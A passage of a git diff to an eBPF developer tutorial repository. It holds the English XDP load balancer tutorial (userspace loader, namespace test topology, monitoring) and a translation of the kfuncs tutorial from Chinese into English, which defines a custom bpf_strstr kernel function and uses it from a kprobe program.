defined `iph_csum()` function. - - ```c - iph->check = iph_csum(iph); - ``` - -- **Final Action**: - The packet is transmitted using the `XDP_TX` action, which instructs the NIC to send the modified packet. - - ```c - return XDP_TX; - ``` - -### 5. **Conclusion** - -This part of the blog could explain how the load balancer ensures traffic is efficiently routed between the client and two backend servers by inspecting the source IP, hashing it for load distribution, and modifying the destination IP and MAC before forwarding the packet. The `XDP_TX` action is key to the high-speed packet handling provided by eBPF in the XDP layer. - -This explanation can help readers understand the flow of the packet and the role of each section of the code in managing load balancing across multiple backends. - -## Userspace code - -```c -// xdp_lb.c -#include -#include -#include -#include -#include -#include -#include -#include -#include "xdp_lb.skel.h" // The generated skeleton - -struct backend_config { - __u32 ip; - unsigned char mac[6]; -}; - -static int parse_mac(const char *str, unsigned char *mac) { - if (sscanf(str, "%hhx:%hhx:%hhx:%hhx:%hhx:%hhx", - &mac[0], &mac[1], &mac[2], &mac[3], &mac[4], &mac[5]) != 6) { - fprintf(stderr, "Invalid MAC address format\n"); - return -1; - } - return 0; -} - -int main(int argc, char **argv) { - if (argc != 6) { - fprintf(stderr, "Usage: %s \n", argv[0]); - return 1; - } - - const char *ifname = argv[1]; - struct backend_config backend[2]; - - // Parse backend 1 - if (inet_pton(AF_INET, argv[2], &backend[0].ip) != 1) { - fprintf(stderr, "Invalid backend 1 IP address\n"); - return 1; - } - if (parse_mac(argv[3], backend[0].mac) < 0) { - return 1; - } - - // Parse backend 2 - if (inet_pton(AF_INET, argv[4], &backend[1].ip) != 1) { - fprintf(stderr, "Invalid backend 2 IP address\n"); - return 1; - } - if (parse_mac(argv[5], backend[1].mac) < 0) { - return 1; - } - - // Load and attach the BPF program - struct xdp_lb_bpf *skel = xdp_lb_bpf__open_and_load(); - if (!skel) { - fprintf(stderr, "Failed to open and load BPF skeleton\n"); - return 1; - } - - int ifindex = if_nametoindex(ifname); - if (ifindex < 0) { - perror("if_nametoindex"); - xdp_lb_bpf__destroy(skel); - return 1; - } - - if (bpf_program__attach_xdp(skel->progs.xdp_load_balancer, ifindex) < 0) { - fprintf(stderr, "Failed to attach XDP program\n"); - xdp_lb_bpf__destroy(skel); - return 1; - } - - // Update backend configurations - for (int i = 0; i < 2; i++) { - if (bpf_map_update_elem(bpf_map__fd(skel->maps.backends), &i, &backend[i], 0) < 0) { - perror("bpf_map_update_elem"); - xdp_lb_bpf__destroy(skel); - return 1; - } - } - - printf("XDP load balancer configured with backends:\n"); - printf("Backend 1 - IP: %s, MAC: %s\n", argv[2], argv[3]); - printf("Backend 2 - IP: %s, MAC: %s\n", argv[4], argv[5]); - - printf("Press Ctrl+C to exit...\n"); - while (1) { - sleep(1); // Keep the program running - } - - // Cleanup and detach - bpf_xdp_detach(ifindex, 0, NULL); - xdp_lb_bpf__detach(skel); - xdp_lb_bpf__destroy(skel); - return 0; -} -``` - -The userspace code provided is responsible for setting up and configuring the XDP load balancer program that runs in the kernel. It accepts command-line arguments, loads the eBPF program, attaches it to a network interface, and updates the backend configurations. - -### 1. **Argument Parsing and Backend Setup** - -The program expects five command-line arguments: the name of the network interface (`ifname`), the IP addresses and MAC addresses of two backend servers. It then parses the IP addresses using `inet_pton()` and the MAC addresses using the `parse_mac()` function, which ensures that the format of the provided MAC addresses is correct. The parsed backend information is stored in a `backend_config` structure. - -### 2. **Loading and Attaching the BPF Program** - -The BPF skeleton (generated via `xdp_lb.skel.h`) is used to open and load the XDP program into the kernel. The program then identifies the network interface by converting the interface name into an index using `if_nametoindex()`. Afterward, it attaches the loaded BPF program to this interface using `bpf_program__attach_xdp()`. - -### 3. **Configuring Backend Information** - -The backend IP and MAC addresses are written to the `backends` BPF map using `bpf_map_update_elem()`. This step ensures that the BPF program has access to the backend configurations, allowing it to route packets to the correct backend servers based on the logic in the kernel code. - -### 4. **Program Loop and Cleanup** - -The program enters an infinite loop (`while (1) { sleep(1); }`) to keep running, allowing the XDP program to continue functioning. When the user decides to exit by pressing Ctrl+C, the BPF program is detached from the network interface, and resources are cleaned up by calling `xdp_lb_bpf__destroy()`. - -In summary, this userspace code is responsible for configuring and managing the lifecycle of the XDP load balancer, making it easy to update backend configurations dynamically and ensuring the load balancer is correctly attached to a network interface. - -## The topology of test environment - -The topology represents a test environment where a local machine communicates with two backend nodes (h2 and h3) through a load balancer. The local machine is connected to the load balancer via virtual Ethernet pairs (veth0 to veth6), simulating network connections in a controlled environment. Each virtual interface has its own IP and MAC address to represent different entities. - -```txt - +---------------------------+ - | Local Machine | - | IP: 10.0.0.1 (veth0) | - | MAC: DE:AD:BE:EF:00:01 | - +------------+---------------+ - | - | (veth1) - | - +--------+---------------+ - | Load Balancer | - | IP: 10.0.0.10 (veth6) | - | MAC: DE:AD:BE:EF:00:10| - +--------+---------------+ - | - +---------+----------------------------+ - | | -(veth2) (veth4) - | | -+--+---------------+ +--------+---------+ -| h2 | | h3 | -| IP: | | IP: | -|10.0.0.2 (veth3) | |10.0.0.3 (veth5) | -| MAC: | | MAC: | -|DE:AD:BE:EF:00:02 | |DE:AD:BE:EF:00:03 | -+------------------+ +------------------+ -``` - -The setup can be easily initialized with a script (setup.sh), and removed with a teardown script (teardown.sh). - -> If you are interested in this tutorial, please help us create a containerized version of the setup and topology! Currently the setup and teardown are based on the network namespace, it will be more friendly to have a containerized version of the setup and topology. - -Setup: - -```sh -sudo ./setup.sh -``` - -Teardown: - -```sh -sudo ./teardown.sh -``` - -### Running the Load Balancer - -To run the XDP load balancer, execute the following command, specifying the interface and backends' IP and MAC addresses: - -```console -sudo ip netns exec lb ./xdp_lb veth6 10.0.0.2 de:ad:be:ef:00:02 10.0.0.3 de:ad:be:ef:00:03 -``` - -This will configure the load balancer and print the details of the backends: - -```console -XDP load balancer configured with backends: -Backend 1 - IP: 10.0.0.2, MAC: de:ad:be:ef:00:02 -Backend 2 - IP: 10.0.0.3, MAC: de:ad:be:ef:00:03 -Press Ctrl+C to exit... -``` - -### Testing the Setup - -You can test the setup by starting HTTP servers on the two backend namespaces (`h2` and `h3`) and sending requests from the local machine to the load balancer: - -Start servers on `h2` and `h3`: - -```sh -sudo ip netns exec h2 python3 -m http.server -sudo ip netns exec h3 python3 -m http.server -``` - -Then, send a request to the load balancer IP: - -```sh -curl 10.0.0.10:8000 -``` - -The load balancer will distribute traffic to the backends (`h2` and `h3`) based on the hashing function. - -### Monitoring with `bpf_printk` - -You can monitor the load balancer's activity by checking the `bpf_printk` logs. The BPF program prints diagnostic messages whenever a packet is processed. You can view these logs using: - -```console -sudo cat /sys/kernel/debug/tracing/trace_pipe -``` - -Example output: - -```console --0 [004] ..s2. 24174.812722: bpf_trace_printk: xdp_load_balancer received packet --0 [004] .Ns2. 24174.812729: bpf_trace_printk: Received Source IP: 0xa000001 --0 [004] .Ns2. 24174.812729: bpf_trace_printk: Received Destination IP: 0xa00000a --0 [004] .Ns2. 24174.812731: bpf_trace_printk: Received Source MAC: de:ad:be:ef:0:1 --0 [004] .Ns2. 24174.812732: bpf_trace_printk: Received Destination MAC: de:ad:be:ef:0:10 --0 [004] .Ns2. 24174.812732: bpf_trace_printk: Packet from client --0 [004] .Ns2. 24174.812734: bpf_trace_printk: Redirecting packet to new IP 0xa000002 from IP 0xa00000a --0 [004] .Ns2. 24174.812735: bpf_trace_printk: New Dest MAC: de:ad:be:ef:0:2 --0 [004] .Ns2. 24174.812735: bpf_trace_printk: New Source MAC: de:ad:be:ef:0:10 -``` - -### Debugging Issues - -Some systems may experience packet loss or failure to forward packets due to issues similar to those described in this [blog post](https://fedepaol.github.io/blog/2023/09/11/xdp-ate-my-packets-and-how-i-debugged-it/). You can debug these issues using `bpftrace` to trace XDP errors: - -```sh -sudo bpftrace -e 'tracepoint:xdp:xdp_bulk_tx{@redir_errno[-args->err] = count();}' -``` - -If you see an output like this: - -```sh -@redir_errno[6]: 3 -``` - -It indicates errors related to XDP packet forwarding. The error code `6` typically points to a particular forwarding issue that can be further investigated. - -### Conclusion - -This tutorial demonstrates how to set up a simple XDP load balancer using eBPF, providing efficient traffic distribution across backend servers. For those interested in learning more about eBPF, including more advanced examples and tutorials, please visit our [https://github.com/eunomia-bpf/bpf-developer-tutorial](https://github.com/eunomia-bpf/bpf-developer-tutorial) or our website [https://eunomia.dev/tutorials/](https://eunomia.dev/tutorials/). - -### References - -Here’s a simple list of XDP references: - -1. [XDP Programming Hands-On Tutorial](https://github.com/xdp-project/xdp-tutorial) -2. [XDP Tutorial in bpf-developer-tutorial](https://eunomia.dev/tutorials/21-xdp/) diff --git a/src/43-kfuncs/README.md b/src/43-kfuncs/README.md index f80f394..a3ba587 100644 --- a/src/43-kfuncs/README.md +++ b/src/43-kfuncs/README.md @@ -1,184 +1,184 @@ -# 超越 eBPF 的极限:在内核模块中定义自定义 kfunc +# Extending eBPF Beyond Its Limits: Custom kfuncs in Kernel Modules -你是否曾经觉得 eBPF 的能力有限?也许你遇到了现有 eBPF 功能无法实现目标的情况。或许你需要与内核进行更深层次的交互,或者标准 eBPF 运行时无法解决的性能问题。如果你曾经希望在 eBPF 程序中拥有更多的灵活性和强大功能,那么本教程正适合你。 +Have you ever felt constrained by eBPF's capabilities? Maybe you've run into situations where the existing eBPF features just aren't enough to accomplish your goals. Perhaps you need deeper interactions with the kernel, or you're facing performance issues that the standard eBPF runtime can't solve. If you've ever wished for more flexibility and power in your eBPF programs, this tutorial is for you. -## 引言:添加 `strstr` kfunc 以突破 eBPF 运行时的限制 +## Introduction: Adding a `strstr` kfunc to Break Free from eBPF Runtime Limitations -**eBPF(扩展伯克利包过滤器)** 通过允许开发者在内核中运行受沙箱限制的程序,彻底改变了 Linux 系统编程。它在网络、安全和可观测性方面具有革命性的作用,能够实现强大的功能,而无需修改内核源代码或加载传统的内核模块。 +**eBPF (extended Berkeley Packet Filter)** has revolutionized Linux system programming by allowing developers to run sandboxed programs inside the kernel. It's a game-changer for networking, security, and observability, enabling powerful functionalities without the need to modify kernel source code or load traditional kernel modules. -但尽管 eBPF 非常强大,它也并非没有局限性: +But as amazing as eBPF is, it isn't without its limitations: -- **功能差距:** 有时,eBPF 运行时的现有功能无法提供你所需的特定能力。 -- **复杂需求:** 某些任务需要更复杂的内核交互,而 eBPF 无法开箱即用地处理这些需求。 -- **性能问题:** 在某些情况下,eBPF 运行时的开销会引入延迟,或者在高性能需求下效率不够。 +- **Functionality Gaps:** Sometimes, the existing features of the eBPF runtime don't provide the specific capabilities you need. +- **Complex Requirements:** Certain tasks demand more intricate kernel interactions that eBPF can't handle out of the box. +- **Performance Issues:** In some cases, the overhead of the eBPF runtime introduces latency or isn't efficient enough for high-performance requirements. -这些挑战源于**整个 eBPF 运行时的限制**,而不仅仅是其辅助函数。那么,如何在不修改内核本身的情况下克服这些障碍呢? +These challenges stem from the limitations of the **entire eBPF runtime**, not just its helper functions. So how do you overcome these hurdles without altering the kernel itself? -引入**kfunc(BPF 内核函数)**。通过在内核模块中定义你自己的 kfunc,可以将 eBPF 的能力扩展到默认限制之外。这种方法让你能够: +Enter **kfuncs (BPF Kernel Functions)**. By defining your own kfuncs within kernel modules, you can extend eBPF's capabilities beyond its default limitations. This approach lets you: -- **增强功能:** 引入标准 eBPF 运行时中不可用的新操作。 -- **定制行为:** 根据你的特定需求定制内核交互。 -- **提升性能:** 通过在内核上下文中直接执行自定义代码,优化关键路径。 +- **Enhance Functionality:** Introduce new operations that aren't available in the standard eBPF runtime. +- **Customize Behavior:** Tailor kernel interactions to fit your specific needs. +- **Boost Performance:** Optimize critical paths by executing custom code directly in the kernel context. -**在本教程中,我们将特别添加一个 `strstr` kfunc。** 由于 eBPF 的验证器限制,直接在 eBPF 中实现字符串搜索是具有挑战性的,而将其定义为 kfunc 则允许我们安全高效地绕过这些限制,执行更复杂的操作。 +**In this tutorial, we'll specifically add a `strstr` kfunc.** While implementing a string search directly in eBPF is challenging due to verifier restrictions, defining it as a kfunc allows us to bypass these limitations and perform more complex operations safely and efficiently. -最棒的是,你可以在不修改核心内核的情况下实现这一目标,保持系统的稳定性和代码的安全性。 +Best of all, you achieve this without modifying the core kernel, keeping your system stable and your code safe. -在本教程中,我们将展示如何定义自定义 kfunc 以填补 eBPF 功能的任何空白。我们将逐步讲解如何创建一个引入新 kfunc 的内核模块,并演示如何在 eBPF 程序中使用它们。无论你是希望克服性能瓶颈,还是需要 eBPF 运行时未提供的功能,自定义 kfunc 都能为你的项目解锁新的可能性。 +In this tutorial, we'll show you how to define custom kfuncs to fill any gaps in eBPF's capabilities. We'll walk through creating a kernel module that introduces new kfuncs and demonstrate how to use them in your eBPF programs. Whether you're looking to overcome performance bottlenecks or need features the eBPF runtime doesn't offer, custom kfuncs can unlock new possibilities for your projects. -## 理解 kfunc:扩展 eBPF 超越辅助函数 +## Understanding kfunc: Extending eBPF Beyond Helpers -### 什么是 kfunc? +### What Are kfuncs? -**BPF 内核函数(kfuncs)** 是 Linux 内核中的专用函数,供 eBPF 程序使用。与标准的 eBPF 辅助函数不同,kfuncs 没有稳定的接口,并且在不同的内核版本之间可能有所变化。这种可变性意味着使用 kfuncs 的 BPF 程序需要与内核更新同步更新,以保持兼容性和稳定性。 +**BPF Kernel Functions (kfuncs)** are specialized functions within the Linux kernel that are exposed for use by eBPF programs. Unlike standard eBPF helpers, kfuncs do not have a stable interface and can vary between kernel releases. This variability means that BPF programs utilizing kfuncs need to be updated in tandem with kernel updates to maintain compatibility and stability. -### 为什么使用 kfuncs? +### Why Use kfuncs? -1. **扩展功能:** kfuncs 允许执行标准 eBPF 辅助函数无法完成的操作。 -2. **定制化:** 定义针对特定用例量身定制的逻辑,增强 eBPF 程序的灵活性。 -3. **安全与稳定:** 通过将 kfuncs 封装在内核模块中,避免直接修改核心内核,保持系统完整性。 +1. **Extended Functionality:** kfuncs enable operations that standard eBPF helpers cannot perform. +2. **Customization:** Define logic tailored to specific use cases, enhancing the flexibility of eBPF programs. +3. **Safety and Stability:** By encapsulating kfuncs within kernel modules, you avoid direct modifications to the core kernel, preserving system integrity. -### kfuncs 在 eBPF 中的角色 +### How kfuncs Fit into eBPF -kfuncs 作为 eBPF 程序与更深层次内核功能之间的桥梁。它们允许 eBPF 程序执行更复杂的操作,通过暴露现有内核函数或引入专为 eBPF 交互设计的新包装函数。这种集成在确保 eBPF 程序保持安全和可维护的同时,促进了更深入的内核交互。 +kfuncs serve as bridges between eBPF programs and deeper kernel functionalities. They allow eBPF programs to perform more intricate operations by either exposing existing kernel functions or introducing new wrappers specifically designed for eBPF interactions. This integration facilitates deeper kernel interactions while ensuring that eBPF programs remain safe and maintainable. -需要注意的是,Linux 内核已经包含了大量的 kfuncs。这些内置的 kfuncs 覆盖了广泛的功能,大多数开发者无需定义新的 kfuncs 就能完成任务。然而,在现有 kfuncs 无法满足特定需求的情况下,定义自定义 kfuncs 就变得必要。本教程将演示如何定义新的 kfuncs 以填补任何空白,确保你的 eBPF 程序能够利用你所需的确切功能。eBPF 也可以扩展到用户空间。在用户空间 eBPF 运行时 [bpftime](https://github.com/eunomia-bpf/bpftime) 中,我们也在实现 ufuncs,它们类似于 kfuncs,但扩展了用户空间应用程序。 +It's important to note that the Linux kernel already includes a plethora of kfuncs. These built-in kfuncs cover a wide range of functionalities, allowing most developers to accomplish their tasks without the need to define new ones. However, in cases where the existing kfuncs do not meet specific requirements, defining custom kfuncs becomes necessary. This tutorial demonstrates how to define new kfuncs to fill any gaps, ensuring that your eBPF programs can leverage the exact functionality you need. eBPF can also be extended to userspace. In the userspace eBPF runtime [bpftime](https://github.com/eunomia-bpf/bpftime), we are also implementing ufuncs, which are similar to kfuncs but extend userspace applications. -## kfuncs 及其演变概述 +## Overview of kfuncs and Their Evolution -要理解 kfuncs 的重要性,必须了解它们与 eBPF 辅助函数的演变关系。 +To appreciate the significance of kfuncs, it's essential to understand their evolution in relation to eBPF helper functions. -![累计辅助函数和 kfunc 时间线](https://raw.githubusercontent.com/eunomia-bpf/code-survey/main/imgs/cumulative_helper_kfunc_timeline.png) +![Cumulative Helper and kfunc Timeline](https://raw.githubusercontent.com/eunomia-bpf/code-survey/main/imgs/cumulative_helper_kfunc_timeline.png) -**关键要点:** +**Key Takeaways:** -- **辅助函数的稳定性:** eBPF 辅助函数保持了高度的稳定性,新增内容较少。 -- **kfuncs 的快速增长:** kfuncs 的采用和创建显著增加,表明社区有兴趣通过 kfuncs 扩展内核交互。 -- **向更深层次内核集成的转变:** 自 2023 年以来,新的用例主要利用 kfuncs 影响内核行为,显示出通过 kfuncs 实现更深层次内核集成的趋势。 +- **Stability of Helper Functions:** eBPF helper functions have remained largely stable, with minimal new additions. +- **Rapid Growth of kfuncs:** There's been a significant increase in the adoption and creation of kfuncs, indicating the community's interest in expanding kernel interactions via kfuncs. +- **Shift Towards Deeper Kernel Integrations:** Since 2023, new use cases predominantly leverage kfuncs to influence kernel behavior, signaling a trend towards more profound kernel integrations through eBPF. -这一趋势凸显了社区通过 kfuncs 更深入地与内核集成,推动 eBPF 能力边界的决心。 +This trend underscores the community's drive to push the boundaries of what eBPF can achieve by integrating more deeply with the kernel through kfuncs. -## 定义你自己的 kfunc:分步指南 +## Defining Your Own kfunc: A Step-by-Step Guide -为了利用 kfuncs 的强大功能,你需要在内核模块中定义它们。这个过程确保你的自定义函数能够安全地暴露给 eBPF 程序,而无需修改核心内核。 +To harness the power of kfuncs, you'll need to define them within a kernel module. This process ensures that your custom functions are safely exposed to eBPF programs without altering the core kernel. -### 编写内核模块 +### Writing the Kernel Module -让我们从创建一个简单的内核模块开始,该模块定义一个 `strstr` kfunc。这个 kfunc 将执行子字符串搜索操作,作为理解机制的基础。 +Let's start by creating a simple kernel module that defines a `strstr` kfunc. This kfunc will perform a substring search operation, serving as a foundation for understanding the mechanics. -#### **文件:`hello.c`** +#### **File: `hello.c`** ```c -#include // 模块初始化宏 -#include // 加载模块的核心头文件 -#include // 内核日志宏 +#include // Macros for module initialization +#include // Core header for loading modules +#include // Kernel logging macros #include #include #include -/* 声明 kfunc 原型 */ +/* Declare the kfunc prototype */ __bpf_kfunc int bpf_strstr(const char *str, u32 str__sz, const char *substr, u32 substr__sz); -/* 开始 kfunc 定义 */ +/* Begin kfunc definitions */ __bpf_kfunc_start_defs(); -/* 定义 bpf_strstr kfunc */ +/* Define the bpf_strstr kfunc */ __bpf_kfunc int bpf_strstr(const char *str, u32 str__sz, const char *substr, u32 substr__sz) { - // 边界情况:如果 substr 为空,返回 0(假设空字符串在开始处找到) + // Edge case: if substr is empty, return 0 (assuming empty string is found at the start) if (substr__sz == 0) { return 0; } - // 边界情况:如果子字符串比主字符串长,则无法找到 + // Edge case: if the substring is longer than the main string, it's impossible to find if (substr__sz > str__sz) { - return -1; // 返回 -1 表示未找到 + return -1; // Return -1 to indicate not found } - // 遍历主字符串,考虑大小限制 + // Iterate through the main string, considering the size limit for (size_t i = 0; i <= str__sz - substr__sz; i++) { size_t j = 0; - // 将子字符串与当前主字符串位置进行比较 + // Compare the substring with the current position in the string while (j < substr__sz && str[i + j] == substr[j]) { j++; } - // 如果整个子字符串都匹配 + // If the entire substring was found if (j == substr__sz) { - return i; // 返回第一次匹配的索引 + return i; // Return the index of the first match } } - // 如果未找到子字符串,返回 -1 + // Return -1 if the substring is not found return -1; } -/* 结束 kfunc 定义 */ +/* End kfunc definitions */ __bpf_kfunc_end_defs(); -/* 定义 BTF kfuncs ID 集 */ +/* Define the BTF kfuncs ID set */ BTF_KFUNCS_START(bpf_kfunc_example_ids_set) BTF_ID_FLAGS(func, bpf_strstr) BTF_KFUNCS_END(bpf_kfunc_example_ids_set) -/* 注册 kfunc ID 集 */ +/* Register the kfunc ID set */ static const struct btf_kfunc_id_set bpf_kfunc_example_set = { .owner = THIS_MODULE, .set = &bpf_kfunc_example_ids_set, }; -/* 模块加载时执行的函数 */ +/* Function executed when the module is loaded */ static int __init hello_init(void) { int ret; printk(KERN_INFO "Hello, world!\n"); - /* 注册 BPF_PROG_TYPE_KPROBE 的 BTF kfunc ID 集 */ + /* Register the BTF kfunc ID set for BPF_PROG_TYPE_KPROBE */ ret = register_btf_kfunc_id_set(BPF_PROG_TYPE_KPROBE, &bpf_kfunc_example_set); if (ret) { - pr_err("bpf_kfunc_example: 注册 BTF kfunc ID 集失败\n"); + pr_err("bpf_kfunc_example: Failed to register BTF kfunc ID set\n"); return ret; } - printk(KERN_INFO "bpf_kfunc_example: 模块加载成功\n"); - return 0; // 成功返回 0 + printk(KERN_INFO "bpf_kfunc_example: Module loaded successfully\n"); + return 0; // Return 0 if successful } -/* 模块卸载时执行的函数 */ +/* Function executed when the module is removed */ static void __exit hello_exit(void) { - /* 取消注册 BTF kfunc ID 集 */ + /* Unregister the BTF kfunc ID set */ unregister_btf_kfunc_id_set(BPF_PROG_TYPE_KPROBE, &bpf_kfunc_example_set); - printk(KERN_INFO "再见,世界!\n"); + printk(KERN_INFO "Goodbye, world!\n"); } -/* 定义模块的初始化和退出点的宏 */ +/* Macros to define the module’s init and exit points */ module_init(hello_init); module_exit(hello_exit); -MODULE_LICENSE("GPL"); // 许可证类型(GPL) -MODULE_AUTHOR("Your Name"); // 模块作者 -MODULE_DESCRIPTION("一个简单的模块"); // 模块描述 -MODULE_VERSION("1.0"); // 模块版本 +MODULE_LICENSE("GPL"); // License type (GPL) +MODULE_AUTHOR("Your Name"); // Module author +MODULE_DESCRIPTION("A simple module"); // Module description +MODULE_VERSION("1.0"); // Module version ``` -**代码解释:** +**Explanation of the Code:** -- **声明 kfunc:** `__bpf_kfunc` 宏声明一个 eBPF 程序可以调用的函数。在这里,`bpf_strstr` 执行给定字符串中的子字符串搜索。 +- **Declaring the kfunc:** The `__bpf_kfunc` macro declares a function that eBPF programs can invoke. Here, `bpf_strstr` performs a substring search within a given string. -- **BTF 定义:** `__bpf_kfunc_start_defs` 和 `__bpf_kfunc_end_defs` 宏标示 kfunc 定义的开始和结束。`BTF_KFUNCS_START` 及相关宏帮助将 kfuncs 注册到 BPF 类型格式(BTF)。 +- **BTF Definitions:** The `__bpf_kfunc_start_defs` and `__bpf_kfunc_end_defs` macros demarcate the beginning and end of kfunc definitions. The `BTF_KFUNCS_START` and related macros assist in registering the kfuncs with the BPF Type Format (BTF). -- **模块初始化:** `hello_init` 函数注册 kfunc ID 集,使 `bpf_strstr` 可用于 `BPF_PROG_TYPE_KPROBE` 类型的 eBPF 程序。 +- **Module Initialization:** The `hello_init` function registers the kfunc ID set, making `bpf_strstr` available to eBPF programs of type `BPF_PROG_TYPE_KPROBE`. -- **模块清理:** `hello_exit` 函数确保在模块移除时取消注册 kfunc ID 集,保持系统整洁。 +- **Module Cleanup:** The `hello_exit` function ensures that the kfunc ID set is unregistered upon module removal, maintaining system cleanliness. -#### **文件:`Makefile`** +#### **File: `Makefile`** ```makefile -obj-m += hello.o # hello.o 是目标 +obj-m += hello.o # hello.o is the target -# 启用 BTF 生成 +# Enable BTF generation KBUILD_CFLAGS += -g -O2 all: @@ -188,118 +188,118 @@ clean: make -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean ``` -**Makefile 解释:** +**Explanation of the Makefile:** -- **目标定义:** `obj-m += hello.o` 指定 `hello.o` 是要构建的模块。 +- **Target Definition:** `obj-m += hello.o` specifies that `hello.o` is the module to be built. -- **BTF 生成标志:** `KBUILD_CFLAGS += -g -O2` 启用调试信息和优化,便于 BTF 生成。 +- **BTF Generation Flags:** `KBUILD_CFLAGS += -g -O2` enables debug information and optimization, facilitating BTF generation. -- **构建命令:** - - **`all`:** 通过调用内核构建系统编译内核模块。 - - **`clean`:** 清理构建产物。 +- **Build Commands:** + - **`all`:** Compiles the kernel module by invoking the kernel build system. + - **`clean`:** Cleans up the build artifacts. -**注意:** 提供的代码在 Linux 内核版本 **6.11** 上进行了测试。如果你使用的是较早的版本,可能需要实现一些变通方法,例如引用 `compact.h`。 +**Note:** The provided code has been tested on Linux kernel version **6.11**. If you're using an earlier version, you might need to implement workarounds, such as referencing `compact.h`. -### 编译内核模块 +### Compiling the Kernel Module -在内核模块源代码和 Makefile 就位后,按照以下步骤编译模块: +With the kernel module source and Makefile in place, follow these steps to compile the module: -1. **导航到模块目录:** +1. **Navigate to the Module Directory:** ```bash cd /path/to/bpf-developer-tutorial/src/43-kfuncs/module/ ``` -2. **编译模块:** +2. **Compile the Module:** ```bash make ``` - 该命令将生成一个名为 `hello.ko` 的文件,即编译后的内核模块。 + This command will generate a file named `hello.ko`, which is the compiled kernel module. -### 加载内核模块 +### Loading the Kernel Module -要将编译好的模块插入内核,使用 `insmod` 命令: +To insert the compiled module into the kernel, use the `insmod` command: ```bash sudo insmod hello.ko ``` -### 验证模块加载 +### Verifying Module Loading -加载模块后,通过检查内核日志验证其是否成功插入: +After loading the module, verify its successful insertion by checking the kernel logs: ```bash dmesg | tail ``` -**预期输出:** +**Expected Output:** ```txt [ 1234.5678] Hello, world! -[ 1234.5679] bpf_kfunc_example: 模块加载成功 +[ 1234.5679] bpf_kfunc_example: Module loaded successfully ``` -### 移除内核模块 +### Removing the Kernel Module -当不再需要该模块时,使用 `rmmod` 命令卸载它: +When you no longer need the module, unload it using the `rmmod` command: ```bash sudo rmmod hello ``` -**验证移除:** +**Verify Removal:** ```bash dmesg | tail ``` -**预期输出:** +**Expected Output:** ```txt -[ 1234.9876] 再见,世界! +[ 1234.9876] Goodbye, world! ``` -## 处理编译错误 +## Handling Compilation Errors -在编译过程中,可能会遇到以下错误: +During the compilation process, you might encounter the following error: ```txt Skipping BTF generation for /root/bpf-developer-tutorial/src/43-kfuncs/module/hello.ko due to unavailability of vmlinux ``` -**解决方案:** +**Solution:** -1. **安装 `dwarves` 包:** +1. **Install the `dwarves` Package:** - `dwarves` 包提供了生成 BTF 所需的工具。 + The `dwarves` package provides tools necessary for BTF generation. ```sh sudo apt install dwarves ``` -2. **复制 `vmlinux` 文件:** +2. **Copy the `vmlinux` File:** - 确保包含 BTF 信息的 `vmlinux` 文件在构建目录中可用。 + Ensure that the `vmlinux` file, which contains BTF information, is available in the build directory. ```sh sudo cp /sys/kernel/btf/vmlinux /usr/lib/modules/$(uname -r)/build/ ``` - 该命令将 `vmlinux` 文件复制到适当的构建目录,确保成功生成 BTF。 + This command copies the `vmlinux` file to the appropriate build directory, enabling successful BTF generation. -本教程的完整代码可在 [bpf-developer-tutorial 仓库](https://github.com/eunomia-bpf/bpf-developer-tutorial/tree/main/src/43-kfuncs) 的 GitHub 上找到。此代码在 Linux 内核版本 6.11 上进行了测试,对于较低版本,可能需要参考 `compact.h` 进行一些修改。 +The complete code for this tutorial can be found in the [bpf-developer-tutorial repository](https://github.com/eunomia-bpf/bpf-developer-tutorial/tree/main/src/43-kfuncs) on GitHub. This is tested on Linux kernel version 6.11, and some modifications may be required for lower versions, referring to `compact.h`. -## 在 eBPF 程序中使用自定义 kfunc +## Utilizing Your Custom kfunc in an eBPF Program -有了定义自定义 `strstr` kfunc 的内核模块后,下一步是创建一个利用此函数的 eBPF 程序。此交互展示了 kfuncs 引入的增强功能。 +With the kernel module defining your custom `strstr` kfunc in place, the next step is to create an eBPF program that leverages this function. This interaction showcases the enhanced capabilities introduced by kfuncs. -### 编写 eBPF 程序 +### Writing the eBPF Program -创建一个附加到 `do_unlinkat` 内核函数并使用自定义 `bpf_strstr` kfunc 的 eBPF 程序。 +Create an eBPF program that attaches to the `do_unlinkat` kernel function and uses the custom `bpf_strstr` kfunc. -#### **文件:`kfunc.c`** +#### **File: `kfunc.c`** ```c /* SPDX-License-Identifier: (LGPL-2.1 OR BSD-2-Clause) */ @@ -311,7 +311,7 @@ Skipping BTF generation for /root/bpf-developer-tutorial/src/43-kfuncs/module/he typedef unsigned int u32; typedef long long s64; -/* 声明外部 kfunc */ +/* Declare the external kfunc */ extern int bpf_strstr(const char *str, u32 str__sz, const char *substr, u32 substr__sz) __ksym; char LICENSE[] SEC("license") = "Dual BSD/GPL"; @@ -332,36 +332,36 @@ int handle_kprobe(struct pt_regs *ctx) } ``` -**eBPF 代码解释:** +**Explanation of the eBPF Code:** -- **外部 kfunc 声明:** `extern` 关键字声明 `bpf_strstr` 函数,使其在 eBPF 程序中可用。 - -- **Kprobe 附加:** `SEC("kprobe/do_unlinkat")` 宏将 eBPF 程序附加到 `do_unlinkat` 内核函数。每次调用 `do_unlinkat` 时,`handle_kprobe` 函数都会执行。 - -- **使用 kfunc:** 在 `handle_kprobe` 中,eBPF 程序调用 `bpf_strstr`,传入四个参数: - - `str`: 要搜索的主字符串。 - - `str__sz`: 主字符串的大小。 - - `substr`: 要搜索的子字符串。 - - `substr__sz`: 子字符串的大小。 +- **External kfunc Declaration:** The `extern` keyword declares the `bpf_strstr` function, making it accessible within the eBPF program. - 结果(子字符串在主字符串中的首次出现索引,或 -1 表示未找到)然后通过 `bpf_printk` 打印,显示 PID 和结果。 +- **Kprobe Attachment:** The `SEC("kprobe/do_unlinkat")` macro attaches the eBPF program to the `do_unlinkat` kernel function. Every time `do_unlinkat` is invoked, the `handle_kprobe` function executes. -**重要提示:** 由于验证器限制,直接在 eBPF 中实现类似 `strstr` 的函数具有挑战性,因为这限制了循环和复杂的内存访问。通过将 `strstr` 实现为 kfunc,我们绕过了这些限制,使得在 eBPF 程序中执行更复杂和高效的字符串操作成为可能。 +- **Using the kfunc:** Within `handle_kprobe`, the eBPF program calls `bpf_strstr` with four arguments: + - `str`: The main string to search within. + - `str__sz`: The size of the main string. + - `substr`: The substring to search for. + - `substr__sz`: The size of the substring. -### 编译 eBPF 程序 + The result, which is the index of the first occurrence of `substr` in `str` or `-1` if not found, is then printed using `bpf_printk`, displaying both the PID and the result. -要编译 eBPF 程序,确保你已安装必要的工具,如 `clang` 和 `llvm`。以下是编译程序的步骤: +**Important Note:** Implementing a `strstr`-like function directly in eBPF is challenging due to verifier 